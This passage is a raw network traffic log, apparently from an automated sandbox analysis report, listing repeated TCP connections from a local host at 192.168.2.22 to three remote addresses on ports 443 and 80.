      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
